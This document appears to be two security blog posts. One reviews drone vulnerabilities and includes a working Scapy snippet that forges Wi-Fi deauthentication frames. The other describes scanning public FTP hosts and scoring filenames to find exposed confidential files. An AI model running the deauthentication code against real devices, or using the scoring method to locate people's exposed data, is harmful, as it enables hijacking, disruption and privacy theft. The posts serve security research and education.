Drone Insecurities

Airborne cyber attacks against drones have been conducted by hackers, criminals and state-sponsored actors. Unmanned Aerial Vehicles (UAVs) – also known as “drones” – are gaining popularity in many sectors of society. Pioneered by the military, they are now used by law enforcement and criminals alike; hobbyists gather to race them, and retail stores will soon ship purchases with them. To reach the market quickly, vendors often treat security as an afterthought, and both vendors and operators underestimate the intent and capability of hackers to target their products. Researchers have therefore taken up the challenge of exposing their vulnerabilities. Reviewing current security issues and past incidents highlights the problems and their solutions before critical failures in drones cause harm. Before doing so, let’s quickly review the basic inner workings of drones.

Drones: How do they work?

Drones range from highly complex multi-million-dollar military aircraft to toy models available for a hundred dollars. Despite this disparity, their overall architecture can be divided into 1) the aircraft and 2) the ground station. The aircraft groups the sensors and controllers needed to fly, while the ground station includes the software and hardware used to send commands wirelessly: wireless transceivers, flight planning software, aircraft maintenance applications and the operators themselves. The aircraft hosts the flight controller, which processes data from sensors, avionics, communications, autopilot systems and, in some cases, weapons.

Drone Command and Control Diagram

Operators send navigation commands via a Remote Controller (RC), which relays them over a Line-of-Sight (LOS) communication channel. Low-end drones use standard wireless networking protocols, while higher-end models leverage satellite communications. Data from the ground station is transmitted to receivers on the aircraft and processed by the flight controller. The controller merges inputs from various sensors, including the GPS receiver and camera, and drives outputs such as the motors spinning the propellers. Audiovisual data is relayed to the ground station via a second communication channel or stored on removable media. Predefined routes can be programmed using flight planning software to make the aircraft autonomous.
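As a toy illustration of this sense-process-actuate loop (not any vendor's actual firmware; every hardware interface below is hypothetical), a simplified flight controller cycle might look like:

import time

# Toy sketch of a flight controller's sense-process-actuate cycle.
# All hardware interfaces (read_imu, read_rc, set_motors) are hypothetical.
def control_loop(sensors, rc_link, motors, target_pitch=0.0):
    while True:
        attitude = sensors.read_imu()     # orientation from gyro/accelerometer
        commands = rc_link.read_rc()      # operator input over the LOS channel
        # Simplistic proportional correction toward level flight.
        correction = 0.8 * (target_pitch - attitude.pitch)
        motors.set_motors(throttle=commands.throttle, pitch_adjust=correction)
        time.sleep(0.01)                  # ~100 Hz update rate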

Cyberattacks against Drones

Communication channels are the obvious attack vector. Unfortunately, calls for encryption are often downplayed, and proprietary protocols, despite what some may believe, are not safe from reverse engineering and hijacking. In 2009, Iraqi militants found that unencrypted video feeds from U.S. drones could be captured simply by pointing a satellite receiver towards the drone, greatly compromising operational effectiveness. While secure channels are critical, weak encryption is as good as no encryption: it was discovered in 2015 that scrambled video feeds between Israeli UAVs and ground stations could easily be decrypted using open-source software; an attacker only required knowledge of the proper frequencies. That being said, even good encryption is no remedy when paired with a vulnerable key management system, a fact rarely discussed by security vendors pitching solutions.

Lower-end drones have been hacked via known vulnerabilities in wireless networking protocols. SkyJack is an air-to-air attack drone that detects the wireless connections of vulnerable drones nearby and reroutes them to itself, allowing the remote operator to hijack the target. The deauthentication technique it uses is the same one seen against home wireless networks. Other attacks include cracking the WEP network between the flight planning software and the remote controller, allowing the intruder to issue commands to the remote controller.
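For readers unfamiliar with the technique: 802.11 management frames are unauthenticated, so a deauthentication frame can be forged by any radio. A minimal sketch using Scapy (for authorized testing only; the MAC addresses and interface name are placeholders):

# Sketch of the 802.11 deauthentication primitive SkyJack relies on.
# Management frames are unauthenticated, so any radio can forge them.
# MAC addresses and the monitor-mode interface below are placeholders.
from scapy.all import RadioTap, Dot11, Dot11Deauth, sendp

TARGET = "aa:bb:cc:dd:ee:ff"   # victim client MAC (e.g. the drone's controller)
AP     = "11:22:33:44:55:66"   # access point MAC (e.g. the drone itself)

frame = (RadioTap()
         / Dot11(addr1=TARGET, addr2=AP, addr3=AP)
         / Dot11Deauth(reason=7))   # reason 7: class 3 frame from nonassociated STA

# Requires a wireless card in monitor mode; count/inter control the burst.
sendp(frame, iface="wlan0mon", count=10, inter=0.1)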

Communication channels are not the only weak points. Drones require information from their environment in order to navigate; that information is captured by the sensors and passed to the flight controller for processing. Feeding invalid inputs to the sensors can therefore disrupt the aircraft. Invalid GPS data is one explanation for the unexpected landing of a U.S. RQ-170 Sentinel in Iran. The Iranian military maintains it spoofed GPS data by broadcasting signals stronger than those of the legitimate GPS satellites, forcing the Sentinel to land; such an attack has been proven possible against other models. The second theory is that an internal malfunction forced an emergency landing. In either case, the incident highlighted two issues: implicit trust of sensory data sources and unexpected effects of internal errors.
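One mitigation for that implicit trust is to cross-check sensors against one another. A minimal sketch (the threshold and interfaces are illustrative, not taken from any real autopilot) of sanity-checking a GPS fix against a dead-reckoning estimate:

# Sketch: flag implausible GPS jumps by comparing each fix against a
# dead-reckoning estimate from inertial sensors. Threshold is illustrative.
import math

MAX_DIVERGENCE_M = 50.0   # alarm if GPS and inertial estimate disagree by more

def gps_is_plausible(gps_fix, inertial_estimate):
    """Both arguments are (x, y) positions in metres in a local frame."""
    dx = gps_fix[0] - inertial_estimate[0]
    dy = gps_fix[1] - inertial_estimate[1]
    return math.hypot(dx, dy) <= MAX_DIVERGENCE_M

# A flight controller could fall back to inertial navigation (and alert the
# operator) whenever gps_is_plausible() returns False.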

Security is not only about networks; it is also about the robustness of the internal software. MalDrone is malware compiled for ARM Linux that spawns a remote shell on the target drone. The attacker intercepts an unencrypted channel between the ground station and a vulnerable aircraft to upload the malware, gaining direct access to the operating system (OS). An alternative tactic is to modify the firmware of the flight controller or sensors. Users rarely validate the integrity of firmware downloaded online, allowing backdoors to be injected via man-in-the-middle attacks. Hackers may also leverage social engineering to send malicious updates, or exploit a vulnerability to execute arbitrary code and gain remote access to the drone. Like many Internet-of-Things (IoT) devices, drones are seldom updated by their owners and can remain vulnerable for long periods of time.
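Validating firmware integrity does not have to be complicated. A minimal sketch (the filename and the vendor-published digest are placeholders) of checking a downloaded image against a SHA-256 checksum before flashing:

# Sketch: verify a downloaded firmware image against a vendor-published
# SHA-256 digest before flashing. Filename and digest are placeholders.
import hashlib

EXPECTED_SHA256 = "0000000000000000000000000000000000000000000000000000000000000000"

def sha256_of(path, chunk_size=1 << 20):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

if sha256_of("firmware-v1.2.bin") != EXPECTED_SHA256:
    raise SystemExit("Firmware digest mismatch: refusing to flash.")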

Conclusion

As drones continue to find increased usage in civil society, they will be subjected to further analysis. Engineers and operators should never underestimate the capability and intent of malicious actors to target their products, whether for fun, profit or other malicious goals. Lessons learned by the software industry remain mostly unimplemented: lack of secure communications, no firmware integrity validation, loose or absent security controls and slow patching of critical vulnerabilities. The success of the Mirai botnet is a result of these same failings, and drones are not exempt. Unlike the distributed denial-of-service attacks Mirai produced, however, compromised drones raise physical safety concerns and must therefore be secured.

#TheGreatFTPHunt – 2% to 9% of scanned files potentially contain confidential information

In this post, we continue our collection and evaluation of files stored on removable media publicly accessible from the Internet. The collection of filenames from 6,500 hosts is ongoing, so we focus here on evaluating the sensitivity of a file based only on its filename, and present the latest statistics collected in our database.

Introduction

As the collection of filenames from 6,500 hosts is still ongoing, this post focuses on evaluating the sensitivity of a file based only on its filename. Based on current results, 2% to 9% of the 3,000 files reviewed were sensitive or potentially sensitive, and most of the sensitive files are concentrated on a few hosts. These files often include financial information or project data from businesses. So far, 773 hosts containing around 4.5 million files have been scanned.

Discussion

The number of filenames collected is quite large, and we cannot manually evaluate each one for its probable sensitivity. We therefore need a procedure to assess sensitivity automatically. First, we list some definitions and restrictions to clarify what a sensitive file is and what the limitations of our evaluation criteria are.

In this document, a sensitive file refers to a user-generated or software-generated file, based on user input, that contains information that should probably not be publicly accessible and that can be leveraged against an individual or organization. This includes:

  • Personal identification documents; passport, driver’s license, visas, government forms…
  • Personal finance documents; income tax files, insurance forms, credit card statements, mortgage, pay stubs, banking information
  • Personal medical documents; prescriptions, medical records
  • Work-related files; emails, proprietary source code, password lists
  • Business finances; customer lists, sales data, project costs, business deals, investments, payrolls
  • Intellectual property; blueprints, schema, patents, research
  • Network configuration; password files, configuration files, network diagrams, user databases
  • Large databases of emails, addresses and other personal information.

Some types of files were not included in our analysis:

  • Copyrighted / illegally downloaded files. However, we considered text files containing licensing keys to be sensitive.
  • Inappropriate content (nude selfies, personal politics, group affiliations, etc.)
  • Personal pictures, letters.
  • Individual addresses and emails were not considered personal; however, databases of addresses and emails are considered sensitive.

Because of the volume, we cannot download and manually verify each file to confirm its contents; our main restriction is therefore that the assessment must be done solely based on the absolute filename recorded. To evaluate sensitivity, we used three categories: positive, neutral and negative, i.e. a file is very likely sensitive, potentially sensitive, or clearly not sensitive at all. Of course, there is always a possibility that a file labeled as sensitive is not; for example, a file called social security numbers.xls may contain only formulas or an empty form. Ideally, files identified as positive or neutral should be manually vetted.

To automatically assess the sensitivity of a file based on its path and name, we first assess a random sample manually. Using the ORDER BY RANDOM() function of the PostgreSQL database (note: we will need to review whether this function is truly random, which I doubt; performance is not an issue in this experiment), multiple random samples of 100 filenames are retrieved from the database. Each file is shown to the evaluator, who, based on the path, filename and extension, assesses the sensitivity of the file as ‘positive‘, ‘neutral‘ or ‘negative‘. For each run, we log the count of hits in each category.

Listing 1 : Example of a run in which a script asks an evaluator to assess the sensitivity of files based on their absolute paths.
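The original listing is not reproduced here, but a minimal sketch of such a run (assuming a PostgreSQL table named files with a path column; table, column and database names are placeholders) could look like:

# Sketch of a manual-labeling run: pull a random sample of filenames and
# ask the evaluator to label each one. Table/column names are placeholders.
import psycopg2

conn = psycopg2.connect(dbname="ftphunt")
cur = conn.cursor()
cur.execute("SELECT path FROM files ORDER BY RANDOM() LIMIT 100;")

counts = {"p": 0, "u": 0, "n": 0}  # positive / neutral (unsure) / negative
for (path,) in cur.fetchall():
    label = ""
    while label not in counts:
        label = input(f"{path}\n[p]ositive / ne[u]tral / [n]egative? ").strip().lower()
    counts[label] += 1

print("Run totals:", counts)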

The evaluator assesses the filename based on keywords that may indicate the contents of the file. A file containing a word, or as we call it in this document a token, such as sales, passport or passwords is assumed to contain information about sales, a passport scan or a list of passwords. In many cases the filename is too obscure, but the path and extension may still indicate the contents of the file. For example, a path containing the tokens project and finances together with a Microsoft Excel extension will be considered neutral despite a filename of axe189212_c.xls, as the file may contain information about a project. Examples of both scenarios are shown in listings 2 and 3:

Listing 2 : Examples of files that were deemed ‘positive’ hits based on keywords in their absolute path.

Listing 3 : Examples of files that were deemed ‘neutral’ (or ‘unknown’) hits based on keywords in their absolute path.

Filenames in foreign languages are roughly translated using Google Translate; as such, many of them end up labeled as neutral (unknown).

A Python script then divides the filename into tokens, and each token is stored in the database along with the number of times it was found in a positive, neutral or negative hit. Tokens are created slightly differently depending on whether they are located in the path, the filename or the extension. For the extension, a single token is created containing the extension itself; if the file has no extension, or the extension is not one usually associated with known software, no token is created. For the filename, tokens are created by splitting on characters usually known to separate words, such as underscores, dashes, periods and spaces. Lastly, for the path, each directory is used as a token and, unlike filenames, is not split further. An example of this process is shown in listing 4:

Listing 4 : Example of the tokenization of a filename.
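The original listing is missing; as a rough sketch of the tokenization just described (the splitting rules and known-extension list are illustrative, not the actual script):

# Sketch of the tokenization scheme: path directories become whole tokens,
# the filename is split on common separators, and the extension is its own
# token. The known-extension list is illustrative, not exhaustive.
import os
import re

KNOWN_EXTENSIONS = {"pst", "xls", "doc", "pdf", "jpg", "mp3", "txt"}

def tokenize(abs_path):
    directory, filename = os.path.split(abs_path)
    stem, ext = os.path.splitext(filename)

    path_tokens = [d.lower() for d in directory.split("/") if d]
    name_tokens = [t.lower() for t in re.split(r"[ _.\-]+", stem) if t]
    ext = ext.lstrip(".").lower()
    ext_tokens = [ext] if ext in KNOWN_EXTENSIONS else []

    return path_tokens, name_tokens, ext_tokens

print(tokenize("/My_Passport/backup/Outlook emails backup.pst"))
# (['my_passport', 'backup'], ['outlook', 'emails', 'backup'], ['pst'])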

Once the tokens are created, the script either adds the token to the database or updates its counts based on the evaluator’s choice. After each update, a score is given to the token, which is simply the ratio between positive hits and the total count of appearances (p / hits). Note that tokens are considered distinct depending on their location in the filename: a filename such as /My_Passport/backup/Outlook emails backup.pst generates two distinct ‘backup’ tokens, one from the path and one from the filename. We explain this decision in the next paragraphs.

Listing 5 : Scores of the tokens extracted from the file in listing 4.
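A minimal sketch of the count-and-score update (an in-memory stand-in for the real database table; the scores in listing 5 are simply p / hits):

# Sketch: update a token's per-category counts and recompute its score,
# where score = positive hits / total hits.
from collections import defaultdict

counts = defaultdict(lambda: {"p": 0, "u": 0, "n": 0})  # token -> hit counts

def update_token(token, label):
    """label is 'p' (positive), 'u' (neutral) or 'n' (negative)."""
    counts[token][label] += 1

def score(token):
    c = counts[token]
    hits = c["p"] + c["u"] + c["n"]
    return c["p"] / hits if hits else 0.0

update_token(("name", "backup"), "p")   # tokens keyed by (location, text)
update_token(("name", "backup"), "n")
print(score(("name", "backup")))        # 0.5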

By using this procedure, we believe that tokens appearing often in both positive and negative hits will cancel each other out, while tokens strongly associated with either positive or negative hits will remain clearly divided. Some sort of mathematical proof should follow later on (I hope… I need to review discrete maths, I guess). Preliminary results appear to confirm this approach as valid: extensions strongly associated with sensitive content have higher scores, while media files have null scores.

However, there is a need to further refine this process by associating a value, or weight, with the location of the token. Tokens in the path are not as indicative of the sensitivity of the file as tokens in the filename or extension. Even within the path, the highest level is generally less indicative than the lowest one, e.g. /documents/finances 2012/sales/company sales.xls. Therefore, when assessing a new filename, we need to give a score to the path, the filename and the extension. For the path, we retrieve the score of each token and multiply it by a weight corresponding to its location in the structure; tokens not found in the database are given a default score of 0. We then take the average over all tokens as the score of the path. For the filename, we do the same but without considering position. Finally, the stored score of the extension is retrieved from the database; if the extension is not found, a score of 0 is used. This transforms a filename into a set of three real values ranging between 0 and 1. To determine the weights needed for each location, we will use a supervised neural network. More research will be conducted to determine how to use this approach.
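A sketch of this feature extraction (the linear depth weighting is a placeholder for the weights the neural network is meant to learn; token scores are made up for illustration):

# Sketch: map a filename to three features in [0, 1]: weighted average of
# path-token scores, average of filename-token scores, and extension score.

def path_score(path_tokens, token_scores):
    if not path_tokens:
        return 0.0
    # Deeper directories are weighted more heavily (weight grows with depth).
    scored = [((i + 1) / len(path_tokens)) * token_scores.get(("path", t), 0.0)
              for i, t in enumerate(path_tokens)]
    return sum(scored) / len(scored)

def name_score(name_tokens, token_scores):
    if not name_tokens:
        return 0.0
    return sum(token_scores.get(("name", t), 0.0) for t in name_tokens) / len(name_tokens)

def features(path_tokens, name_tokens, ext_tokens, token_scores):
    ext_score = token_scores.get(("ext", ext_tokens[0]), 0.0) if ext_tokens else 0.0
    return (path_score(path_tokens, token_scores),
            name_score(name_tokens, token_scores),
            ext_score)

# Example with made-up token scores:
scores = {("path", "finances"): 0.7, ("name", "sales"): 0.9, ("ext", "xls"): 0.4}
print(features(["documents", "finances"], ["company", "sales"], ["xls"], scores))
# (0.35, 0.45, 0.4)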

Results

As of 16 July 2015, 4,568,738 files have been recorded from 773 hosts.

Country                 Hosts
United States             258
Russian Federation         91
Sweden                     69
Canada                     66
Ukraine                    27
Norway                     24
United Kingdom             24
Australia                  19
Netherlands                18
Hong Kong                  18
Taiwan                     16
Poland                     15
Germany                    11
Romania                    11
Finland                    10
Switzerland                 8
Korea                       8
Singapore                   7
Czech Republic              7
Japan                       6
Table 1. Top 20 countries of the 773 hosts scanned as of 16 July 2015, ordered by number of hosts.

MP3 audio and JPEG image files remain the most common. We therefore focus our statistics on document-type files for a change, i.e. office documents. Adobe PDF files and Microsoft Word documents are the most common document file types in our current data, as shown in figure 1.

Figure 1. Most common file types scanned as of 16 July 2015 for office-related documents

At the moment, around 3,000 files have been assessed (30 runs of 100 samples). For each run, we recorded the number of positive, neutral and negative hits and found the proportions roughly constant across runs (see figure 2). However, more details about the RANDOM function are needed to ensure the randomness of the samples; this part may need to be redone. So far, between 2% and 9% of files scanned are considered sensitive or potentially sensitive (see figure 3). We also need to consider the concentration of these files to put this information into perspective: the 278 files identified as sensitive or potentially sensitive were located on 59 hosts, with one host accounting for 101 of these files. This indicates that files of interest to an attacker are likely to be concentrated on a few hosts.

Figure 2. Assessed sensitivity of 30 randomly selected samples of 100 filenames.
Figure 3. Percentage of files by sensitivity, based on manual assessment of 3,000 randomly selected files.

As for tokens, we will have to consider the entire collection of filenames in order to have samples from multiple sources; we will therefore keep manually assessing samples of 100 filenames as more data is collected, after which we should have an excellent training set for the neural network (see the sketch after table 3). Some high-recurring and high-scoring tokens are shown in tables 2 and 3.

Token            Hits  Score
attach              7  0.9285714286
txn                 7  0.9285714286
planning            6  0.9166666667
archived            6  1
recpt               6  0.9166666667
2010taxreturns      5  1
person~2            4  1
purchase            3  1
order               2  1
Паспорт             2  1
Table 2. Sample of high-scoring tokens, sorted by the number of times observed. (Паспорт is Russian for “passport”.)
Token                      Hits  Score
jpg                         938  0.013326226
mp3                         460  0
music                       448  0
seagate_backup_plus_drive   382  0.1452879581
asusware                    348  0
pictures                    309  0.0048543689
sda1                        285  0.0649122807
bigdaddy                    279  0
elements                    278  0.0485611511
transcend                   247  0.0222672065
my_book                     234  0.0106837607
Table 3. Sample of high-recurring tokens, sorted by the number of times observed.
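As a sketch of the classification step envisioned above (scikit-learn's MLPClassifier is one possible choice, not necessarily the final one; the feature vectors below are illustrative placeholders, not real labeled data):

# Sketch: train a small neural network on the (path, name, extension) scores.
# The vectors below are illustrative placeholders, not real labeled data.
from sklearn.neural_network import MLPClassifier

X = [
    [0.35, 0.45, 0.40],   # hypothetical (path, name, ext) scores
    [0.00, 0.05, 0.00],
    [0.80, 0.90, 0.70],
    [0.10, 0.00, 0.01],
]
y = [1, 0, 1, 0]          # 1 = sensitive/potentially sensitive, 0 = not

clf = MLPClassifier(hidden_layer_sizes=(8,), max_iter=2000, random_state=0)
clf.fit(X, y)
print(clf.predict([[0.6, 0.7, 0.4]]))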

Conclusion

While these results are preliminary, they nevertheless seem to provide a solid indication of what one can find on publicly accessible removable drives. Additional work and fine-tuning of both code and processes are required to produce more accurate data, and the next step, while the scan is still ongoing, is to develop a methodology to assess the sensitivity of all files, likely using a neural network for classification based on the method presented above.